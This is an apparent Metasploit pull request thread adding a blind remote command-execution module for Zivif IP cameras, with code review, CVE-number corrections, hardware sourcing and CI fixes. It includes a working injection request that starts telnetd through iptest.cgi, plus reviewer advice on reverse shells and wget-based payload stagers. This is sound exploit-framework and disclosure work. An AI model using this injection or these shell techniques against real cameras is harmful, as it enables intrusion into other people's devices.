Added exploit for CVE-2017-17106
rapid7/metasploit-framework pull request #13170
Opened 2020-03-29 22:33 UTC by silascutler

**Vulnerable Application**
Zivif is a brand of consumer IP cameras.  Version `2.3.4.2103` and prior are vulnerable to a remote command execution vulnerability - documented in `CVE-2017-171069` 

This module exploits the RCE vulnerability in the web interface of these IP cameras.  This is a blind RCE and the results of the command are not returned to the attacker. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/http/zivif_ipcheck_exec`
- [ ] `set RHOSTS <rhost>`
- [ ] `set PAYLOAD cmd/unix/generic`
- [ ] `set CMD <command>`
- [ ] `exploit`

In testing - for validation, the running `reboot` as the issued `<command>` is a good way to do a quick validation.  Alternatively, using `telnetd` will start Telnet on the vulnerable device.

An example HTTP request from this module is:
```
GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%24%28telnetd%29 HTTP/1.1
Host: <TARGET>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded

```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +# This module requires Metasploit: http://metasploit.com/download
```suggestion
# This module requires Metasploit: https://metasploit.com/download
```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +require 'msf/core'
This shouldn't be necessary.

```suggestion
```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +  Rank = NormalRanking
Is there a reason for only `NormalRanking` ? Is there a risk of rebooting the device or preventing further exploitation?

It looks like a generic command execution in what I'm guessing is the ping interface. Probably:

```suggestion
  Rank = ExcellentRanking
```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +      'Name'             => "Zivif Camera Web Interface Blind Remote Command Execution ",
Usually the module describes the vulnerable functionality to prevent collisions if more than one bug are found.

Suggest:

```suggestion
      'Name'             => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17106' ],
Redundant due to `CVE` reference.

```suggestion
```

Perhaps:

```suggestion
          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    Exploit::CheckCode::Safe
The final `Exploit::CheckCode::Safe` can never be reached, due to the previous `if` / `else`.

Suggest:

```suggestion
    unless res.code && res.code == 200 
      return CheckCode::Safe
    end

    CheckCode::Detected
```

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    cmd = datastore['CMD']
Is there a reason only `cmd/unix/generic` payload is supported, rather than using `payload.encoded` and allowing the operator to choose a payload?

Earlier in the module you've defined `'RequiredCmd' => 'generic perl'` which seems to imply that a Perl reverse shell is possible.

2020-03-30 05:52 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +        '-time' => "1504225666237",
Can this be randomized?

2020-03-30 15:37 UTC, silascutler commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +        '-time' => "1504225666237",
It can be.  Would using something like `rand(1504225666237, 1599999999999)` be safe to do?

2020-03-30 15:40 UTC, silascutler commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    cmd = datastore['CMD']
Thanks for the comment.  I ran into a bit of trouble here (and will push a suggested update to official documentation) as this exploit is a blind RCE, the payload must be a supported shell command.  During testing, sometimes this tried to push a full `/usr/bin/bash <command>` which will fail on target. 

Do you have a recommendation of how to do this better?

2020-03-31 17:45 UTC, bwatters-r7 commented
Tests are failing for the following:
```
modules/exploits/unix/http/zivif_ipcheck_exec.rb - [ERROR] Incorrect disclosure date format
modules/exploits/unix/http/zivif_ipcheck_exec.rb:16 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:33 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:54 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:63 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:64 - [WARNING] Spaces at EOL
```

2020-04-14 17:05 UTC, silascutler commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    cmd = datastore['CMD']
ping @bcoles ?

2020-04-15 07:58 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +        '-time' => "1504225666237",
I'm guessing there's no validation on this param. The least suspicious approach would probably be to convert `Time.now` to an integer, then +/- a random number up to 24 hours to account for timezone differences.

2020-04-15 09:17 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    cmd = datastore['CMD']
I'm not sure I understand. Most of the remote exploits in Metasploit are blind. The issue you're encountering is likely due to bad characters. You'll need to find out which characters cause issues and add them to `BadChars` in the module meta info Hash.

As this is an embedded device, your options for getting a reverse shell may be limited. Did you get a reverse shell while researching the vulnerability? python / perl / netcat ?

One option is to use command stagers such as `curl` or `wget`. Embedded devices often have `wget` installed and in `$PATH`, which allows trivial download and execution of a meterpreter payload (presuming there's a meterpreter payload for the target architecture).

Command stagers are the preferred option. However, in your proof of concept, you demonstrate that it is possible to start `telneted`. This is a viable approach, as you can then connect to the Telnet service to get a session.

Perhaps this will help.

* https://gist.github.com/bcoles/f4f528fa67c887d157be95d60d7fc9d2
* https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb

Both modules target the same vulnerability.

The first module demonstrates getting a `cmd_interact` session using the `telnetd` technique.

The second module demonstrates using a command stager.

2020-04-22 04:10 UTC, gwillcox-r7 commented
@silascutler Looking online to try source this camera. I can see that there are newer models however the one listed  as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module as CVE-2017-171069 is not a valid CVE identifier, however CVE-2017-17106 is and this is the one used in your PR title.

Looking around I can't see anyone selling this camera on Amazon and the only people selling the older versions of these cameras I could find was on EBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.

Therefore at the moment it is looking to be very hard to source one of these cameras to perform testing on.

2020-05-12 18:33 UTC, silascutler commented
> @silascutler Looking online to try source this camera. I can see that there are newer models however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module as CVE-2017-171069 is not a valid CVE identifier, however CVE-2017-17106 is and this is the one used in your PR title.

I think the correct CVE should actually be CVE-2017-17105 - which covers the remote command injection (https://nvd.nist.gov/vuln/detail/CVE-2017-17105).



> Looking around I can't see anyone selling this camera on Amazon and the only people selling the older versions of these cameras I could find was on EBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.
> 
> Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).

Yep PR115 is still vulnerable.  Also https://www.amazon.com/gp/product/B06Y5VTWC9/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1 .  I also just ordered https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=zivif&qid=1589308250&s=electronics&sr=1-1 to verify on that device as well.

The original documentation of the exploit can be found: https://seclists.org/fulldisclosure/2017/Dec/42

2020-05-12 20:09 UTC, gwillcox-r7 commented
> > @silascutler Looking online to try source this camera. I can see that there are newer models however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module as CVE-2017-171069 is not a valid CVE identifier, however CVE-2017-17106 is and this is the one used in your PR title.
> 
> I think the correct CVE should actually be CVE-2017-17105 - which covers the remote command injection (https://nvd.nist.gov/vuln/detail/CVE-2017-17105).
> 
> > Looking around I can't see anyone selling this camera on Amazon and the only people selling the older versions of these cameras I could find was on EBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.
> > Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).
> 
> Yep PR115 is still vulnerable. Also https://www.amazon.com/gp/product/B06Y5VTWC9/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1 . I also just ordered https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=zivif&qid=1589308250&s=electronics&sr=1-1 to verify on that device as well.
> 
> The original documentation of the exploit can be found: https://seclists.org/fulldisclosure/2017/Dec/42

Hmm can't find any PR115's available online. The first link you posted on Amazon shows that they are out of stock but the second one might be interesting if it is still vulnerable as it seems those are still being sold.

2020-06-09 10:40 UTC, agalway-r7 requested changes

2020-06-09 10:40 UTC, adamgalway-r7 commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +      'DisclosureDate'   => "1 September 2017",
Build is currently failing on an incorrect date format. Changes below set the correct format: 
```suggestion
      'DisclosureDate'   => "2017-09-01",
```

2020-06-09 14:28 UTC, adamgalway-r7 commented
@silascutler, we won't able to get a camera that can test the module for a while, especially with COVID on the go. Would you be ok to either send us a Packet Capture of the module's successful execution, or hop on a call with myself and Demo it? Eithers good, so whatever suits you best.

2020-06-09 19:27 UTC, silascutler commented
> @silascutler, we won't able to get a camera that can test the module for a while, especially with COVID on the go. Would you be ok to either send us a Packet Capture of the module's successful execution, or hop on a call with myself and Demo it? Eithers good, so whatever suits you best.

Yes- I'll email you

2020-06-15 15:48 UTC, adamgalway-r7 commented
@silascutler, do you have the module set to executable on your machine? Getting a `Module should not be executable (+x)` error on the Travis build

2020-06-15 16:49 UTC, silascutler commented
> @silascutler, do you have the module set to executable on your machine? Getting a `Module should not be executable (+x)` error on the Travis build

I have the local repo on a shared drive.  I think it's not properly preserving the flag

2020-06-15 19:14 UTC, silascutler commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    cmd = datastore['CMD']
Hey,
In both of those examples, the RCE isn't blind - or potentially I'm mixing terms - you're using the `fingerprint` var to validate execution.  In `mvpower_dvr_shell_exec_telnet.rb`, the `check()` handles this before starting telnet. That said, my only hesitation to follow the mvpower exploit as an example is that I worry about limiting the functionality of the module to only running telnet.

2020-06-15 19:20 UTC, bcoles commented on modules/exploits/unix/http/zivif_ipcheck_exec.rb
> +    cmd = datastore['CMD']
Whether the RCE is blind shouldn't matter. You should still be able to implement a command stager. I offered the `telnetd` solution as a possible alternative if a command stager is not possible for some reason.

2020-06-15 19:56 UTC, silascutler reviewed
Updated PR based on feedback.

2020-06-16 03:14 UTC, silascutler reviewed
Fixed for travis-ci

2020-06-16 09:33 UTC, agalway-r7 approved these changes
Looks good,  will land it ASAP. Good work @silascutler 👍

2020-06-16 12:05 UTC, adamgalway-r7 commented
## Release Notes
Module exploits a vulnerability in the Web Interface of Zivif brand IP cameras of version `2.3.4.2103` and below, facilitating blind RCE.

2020-06-16 12:06 UTC, merged